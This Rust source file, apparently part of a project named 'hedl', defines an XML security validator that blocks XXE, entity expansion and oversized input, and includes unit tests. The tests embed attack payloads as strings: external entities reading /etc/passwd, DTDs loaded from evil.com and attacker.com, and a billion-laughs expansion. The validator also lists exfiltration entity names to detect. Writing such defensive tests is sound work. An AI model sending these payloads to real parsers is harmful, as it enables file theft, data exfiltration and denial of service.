1use std::error::Error;
53use std::fmt;
54
55#[derive(Debug, Clone)]
57pub struct XmlSecurityValidator {
58 pub reject_doctype: bool,
60 pub max_document_size: usize,
62 pub strict_validation: bool,
64}
65
66impl Default for XmlSecurityValidator {
67 fn default() -> Self {
68 Self {
69 reject_doctype: true,
70 max_document_size: 10 * 1024 * 1024, strict_validation: true,
72 }
73 }
74}
75
76impl XmlSecurityValidator {
77 pub fn new(reject_doctype: bool, max_document_size: usize, strict_validation: bool) -> Self {
79 Self {
80 reject_doctype,
81 max_document_size,
82 strict_validation,
83 }
84 }
85
86 pub fn validate(&self, xml: &str) -> Result<(), SecurityViolation> {
99 if xml.len() > self.max_document_size {
101 return Err(SecurityViolation::DocumentSizeExceeded {
102 size: xml.len(),
103 max_size: self.max_document_size,
104 });
105 }
106
107 if self.reject_doctype && self.contains_doctype(xml) {
109 return Err(SecurityViolation::DoctypeDetected);
110 }
111
112 if self.strict_validation {
114 if self.contains_parameter_entity(xml) {
116 return Err(SecurityViolation::ParameterEntityDetected);
117 }
118
119 if self.contains_external_entity(xml) {
121 return Err(SecurityViolation::ExternalEntityDetected);
122 }
123
124 if self.contains_entity_declaration(xml) {
126 return Err(SecurityViolation::EntityDeclarationDetected);
127 }
128 }
129
130 Ok(())
131 }
132
133 fn contains_doctype(&self, xml: &str) -> bool {
140 if !xml.contains("<!") {
142 return false;
143 }
144
145 let upper = xml.to_uppercase();
147 upper.contains("<!DOCTYPE")
148 }
149
150 fn contains_external_entity(&self, xml: &str) -> bool {
154 if !xml.contains("<!") {
156 return false;
157 }
158
159 let upper = xml.to_uppercase();
160
161 if upper.contains("<!ENTITY") {
163 upper.contains("SYSTEM") || upper.contains("PUBLIC")
164 } else {
165 false
166 }
167 }
168
169 fn contains_entity_declaration(&self, xml: &str) -> bool {
173 if !xml.contains("<!") {
175 return false;
176 }
177
178 let upper = xml.to_uppercase();
179 upper.contains("<!ENTITY")
180 }
181
182 fn contains_parameter_entity(&self, xml: &str) -> bool {
190 xml.contains("<!ENTITY %")
193 || xml.contains("%dtd;")
194 || xml.contains("%all;")
195 || xml.contains("%file;")
196 || xml.contains("%send;")
197 || xml.contains("%eval;")
198 }
199}
200
201#[derive(Debug, Clone, PartialEq, Eq)]
203pub enum SecurityViolation {
204 DoctypeDetected,
206 ExternalEntityDetected,
208 EntityDeclarationDetected,
210 ParameterEntityDetected,
212 DocumentSizeExceeded {
214 size: usize,
216 max_size: usize,
218 },
219}
220
221impl fmt::Display for SecurityViolation {
222 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
223 match self {
224 Self::DoctypeDetected => write!(
225 f,
226 "DOCTYPE declarations are prohibited for security (XXE prevention)"
227 ),
228 Self::ExternalEntityDetected => write!(
229 f,
230 "External entity references (SYSTEM/PUBLIC) are prohibited"
231 ),
232 Self::EntityDeclarationDetected => write!(
233 f,
234 "Entity declarations are prohibited (billion laughs prevention)"
235 ),
236 Self::ParameterEntityDetected => write!(
237 f,
238 "Parameter entities are prohibited (data exfiltration prevention)"
239 ),
240 Self::DocumentSizeExceeded { size, max_size } => write!(
241 f,
242 "Document size ({} bytes) exceeds security limit ({} bytes)",
243 size, max_size
244 ),
245 }
246 }
247}
248
249impl Error for SecurityViolation {}
250
251#[cfg(test)]
252mod tests {
253 use super::*;
254
255 #[test]
256 fn test_validator_default() {
257 let validator = XmlSecurityValidator::default();
258 assert!(validator.reject_doctype);
259 assert_eq!(validator.max_document_size, 10 * 1024 * 1024);
260 assert!(validator.strict_validation);
261 }
262
263 #[test]
264 fn test_validator_custom() {
265 let validator = XmlSecurityValidator::new(false, 1024, false);
266 assert!(!validator.reject_doctype);
267 assert_eq!(validator.max_document_size, 1024);
268 assert!(!validator.strict_validation);
269 }
270
271 #[test]
272 fn test_safe_xml_passes() {
273 let validator = XmlSecurityValidator::default();
274 let xml = r#"<?xml version="1.0"?><hedl><data>safe content</data></hedl>"#;
275 assert!(validator.validate(xml).is_ok());
276 }
277
278 #[test]
279 fn test_doctype_detection_uppercase() {
280 let validator = XmlSecurityValidator::default();
281 let xml = r#"<?xml version="1.0"?>
282<!DOCTYPE hedl [<!ENTITY test "value">]>
283<hedl><data>test</data></hedl>"#;
284
285 let result = validator.validate(xml);
286 assert!(result.is_err());
287 assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
288 }
289
290 #[test]
291 fn test_doctype_detection_lowercase() {
292 let validator = XmlSecurityValidator::default();
293 let xml = r#"<?xml version="1.0"?>
294<!doctype hedl [<!ENTITY test "value">]>
295<hedl><data>test</data></hedl>"#;
296
297 let result = validator.validate(xml);
298 assert!(result.is_err());
299 assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
300 }
301
302 #[test]
303 fn test_doctype_detection_mixed_case() {
304 let validator = XmlSecurityValidator::default();
305 let xml = r#"<?xml version="1.0"?>
306<!DoCtYpE hedl [<!ENTITY test "value">]>
307<hedl><data>test</data></hedl>"#;
308
309 let result = validator.validate(xml);
310 assert!(result.is_err());
311 assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
312 }
313
314 #[test]
315 fn test_external_entity_system() {
316 let validator = XmlSecurityValidator::default();
317 let xml = r#"<?xml version="1.0"?>
318<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
319<hedl><data>&xxe;</data></hedl>"#;
320
321 let result = validator.validate(xml);
322 assert!(result.is_err());
323 assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
325 }
326
327 #[test]
328 fn test_external_entity_public() {
329 let validator = XmlSecurityValidator::default();
330 let xml = r#"<?xml version="1.0"?>
331<!DOCTYPE hedl [<!ENTITY xxe PUBLIC "publicId" "http://evil.com/evil.dtd">]>
332<hedl><data>&xxe;</data></hedl>"#;
333
334 let result = validator.validate(xml);
335 assert!(result.is_err());
336 assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
337 }
338
339 #[test]
340 fn test_parameter_entity_attack() {
341 let validator = XmlSecurityValidator::default();
342 let xml = r#"<?xml version="1.0"?>
343<!DOCTYPE hedl [
344 <!ENTITY % file SYSTEM "file:///etc/passwd">
345 <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
346 %dtd;
347]>
348<hedl>&send;</hedl>"#;
349
350 let result = validator.validate(xml);
351 assert!(result.is_err());
352 assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
353 }
354
355 #[test]
356 fn test_billion_laughs_attack() {
357 let validator = XmlSecurityValidator::default();
358 let xml = r#"<?xml version="1.0"?>
359<!DOCTYPE hedl [
360 <!ENTITY lol "lol">
361 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
362 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
363 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
364]>
365<hedl>&lol3;</hedl>"#;
366
367 let result = validator.validate(xml);
368 assert!(result.is_err());
369 assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
370 }
371
372 #[test]
373 fn test_document_size_limit() {
374 let validator = XmlSecurityValidator {
375 max_document_size: 100,
376 ..Default::default()
377 };
378
379 let large_xml = format!(
380 r#"<?xml version="1.0"?><hedl><data>{}</data></hedl>"#,
381 "A".repeat(200)
382 );
383
384 let result = validator.validate(&large_xml);
385 assert!(result.is_err());
386 match result.unwrap_err() {
387 SecurityViolation::DocumentSizeExceeded { size, max_size } => {
388 assert!(size > 100);
389 assert_eq!(max_size, 100);
390 }
391 _ => panic!("Expected DocumentSizeExceeded"),
392 }
393 }
394
395 #[test]
396 fn test_disable_doctype_check() {
397 let validator = XmlSecurityValidator {
398 reject_doctype: false,
399 strict_validation: false,
400 ..Default::default()
401 };
402
403 let xml = r#"<?xml version="1.0"?>
404<!DOCTYPE hedl [<!ELEMENT hedl ANY>]>
405<hedl><data>test</data></hedl>"#;
406
407 assert!(validator.validate(xml).is_ok());
409 }
410
411 #[test]
412 fn test_strict_validation_entity_detection() {
413 let validator = XmlSecurityValidator {
415 reject_doctype: false,
416 strict_validation: true,
417 ..Default::default()
418 };
419
420 let xml = r#"<?xml version="1.0"?>
421<!DOCTYPE hedl [<!ENTITY test "value">]>
422<hedl><data>&test;</data></hedl>"#;
423
424 let result = validator.validate(xml);
425 assert!(result.is_err());
426 assert_eq!(
427 result.unwrap_err(),
428 SecurityViolation::EntityDeclarationDetected
429 );
430 }
431
432 #[test]
433 fn test_strict_validation_external_entity() {
434 let validator = XmlSecurityValidator {
435 reject_doctype: false,
436 strict_validation: true,
437 ..Default::default()
438 };
439
440 let xml = r#"<?xml version="1.0"?>
441<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
442<hedl><data>&xxe;</data></hedl>"#;
443
444 let result = validator.validate(xml);
445 assert!(result.is_err());
446 assert_eq!(
447 result.unwrap_err(),
448 SecurityViolation::ExternalEntityDetected
449 );
450 }
451
452 #[test]
453 fn test_strict_validation_parameter_entity() {
454 let validator = XmlSecurityValidator {
455 reject_doctype: false,
456 strict_validation: true,
457 ..Default::default()
458 };
459
460 let xml = r#"<?xml version="1.0"?>
461<!DOCTYPE hedl [<!ENTITY % file SYSTEM "file:///etc/passwd">]>
462<hedl><data>test</data></hedl>"#;
463
464 let result = validator.validate(xml);
465 assert!(result.is_err());
466 assert_eq!(
467 result.unwrap_err(),
468 SecurityViolation::ParameterEntityDetected
469 );
470 }
471
472 #[test]
473 fn test_comment_with_doctype_string() {
474 let validator = XmlSecurityValidator::default();
475 let xml = r#"<?xml version="1.0"?>
479<!-- This comment mentions <!DOCTYPE but isn't one -->
480<hedl><data>safe</data></hedl>"#;
481
482 let result = validator.validate(xml);
483 assert!(result.is_err());
485 }
486
487 #[test]
488 fn test_cdata_with_doctype_string() {
489 let validator = XmlSecurityValidator::default();
490 let xml = r#"<?xml version="1.0"?>
491<hedl><data><![CDATA[<!DOCTYPE test>]]></data></hedl>"#;
492
493 let result = validator.validate(xml);
494 assert!(result.is_err());
497 }
498
499 #[test]
500 fn test_security_violation_display() {
501 let violation = SecurityViolation::DoctypeDetected;
502 assert!(violation.to_string().contains("DOCTYPE"));
503 assert!(violation.to_string().contains("XXE"));
504
505 let violation = SecurityViolation::ExternalEntityDetected;
506 assert!(violation.to_string().contains("External entity"));
507
508 let violation = SecurityViolation::EntityDeclarationDetected;
509 assert!(violation.to_string().contains("Entity declarations"));
510 assert!(violation.to_string().contains("billion laughs"));
511
512 let violation = SecurityViolation::ParameterEntityDetected;
513 assert!(violation.to_string().contains("Parameter entities"));
514 assert!(violation.to_string().contains("exfiltration"));
515
516 let violation = SecurityViolation::DocumentSizeExceeded {
517 size: 1000,
518 max_size: 500,
519 };
520 let msg = violation.to_string();
521 assert!(msg.contains("1000"));
522 assert!(msg.contains("500"));
523 }
524
525 #[test]
526 fn test_empty_xml() {
527 let validator = XmlSecurityValidator::default();
528 let xml = "";
529 assert!(validator.validate(xml).is_ok());
530 }
531
532 #[test]
533 fn test_xml_declaration_only() {
534 let validator = XmlSecurityValidator::default();
535 let xml = r#"<?xml version="1.0"?>"#;
536 assert!(validator.validate(xml).is_ok());
537 }
538
539 #[test]
540 fn test_simple_element() {
541 let validator = XmlSecurityValidator::default();
542 let xml = r#"<root>test</root>"#;
543 assert!(validator.validate(xml).is_ok());
544 }
545
546 #[test]
547 fn test_nested_elements() {
548 let validator = XmlSecurityValidator::default();
549 let xml = r#"<?xml version="1.0"?>
550<root>
551 <child1>value1</child1>
552 <child2>
553 <nested>value2</nested>
554 </child2>
555</root>"#;
556 assert!(validator.validate(xml).is_ok());
557 }
558
559 #[test]
560 fn test_attributes_allowed() {
561 let validator = XmlSecurityValidator::default();
562 let xml = r#"<?xml version="1.0"?>
563<root attr1="value1" attr2="value2">
564 <child id="123">content</child>
565</root>"#;
566 assert!(validator.validate(xml).is_ok());
567 }
568
569 #[test]
570 fn test_unicode_content() {
571 let validator = XmlSecurityValidator::default();
572 let xml = r#"<?xml version="1.0" encoding="UTF-8"?>
573<root>
574 <data>Hello δΈη π</data>
575</root>"#;
576 assert!(validator.validate(xml).is_ok());
577 }
578
579 #[test]
580 fn test_special_characters_escaped() {
581 let validator = XmlSecurityValidator::default();
582 let xml = r#"<?xml version="1.0"?>
583<root>
584 <data><tag> & "quoted"</data>
585</root>"#;
586 assert!(validator.validate(xml).is_ok());
587 }
588}